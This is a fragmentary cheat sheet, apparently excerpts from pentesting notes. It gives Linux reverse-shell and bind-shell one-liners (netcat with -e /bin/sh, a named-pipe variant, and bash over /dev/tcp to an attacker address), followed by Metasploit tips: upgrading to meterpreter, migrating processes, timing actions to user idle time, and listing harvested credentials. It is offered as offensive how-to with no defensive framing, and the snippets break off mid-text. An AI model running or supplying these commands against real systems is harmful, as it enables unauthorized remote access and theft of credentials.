-
Important notes Linux nc On the own system: [rlwrap] nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution] On the target: nc -e /bin/sh 10.0.3.4 4444 Alternative: mknod /tmp/backpipe p /bin/sh 0</tmp/backpipe | nc $attacker 4444 1>/tmp/backpipe Alternative: /bin/bash -c 'bash -i >& /dev/tcp/$attacker/4444 0>&1' If nc doesn’t seem on the system: Try a Perl reverse shell! Bind shell On…
-
Upgrade a shell to a meterpreter shell sessions -u $session_id Caution: Maybe the buildtuple is the wrong architecture. Show processes ps Show how long the user is not on his/her computer (try things which could pop up shells preferrefly after the system is idle for some time.) idletime Migrate into another process to make the connection…
-
The usual stuff: workspace -a host42 // To create a new workspaceworkspace host42 // To open an existing workspacedb_nmap ...hostsservices...search smb type:auxiliary...vulns // Shows all found vulnerabilitiescreds // Shows all found credentials General usage Payloads Working with sessions Using the database A database can be used to store informations, payloads, etc. To create a initial db,…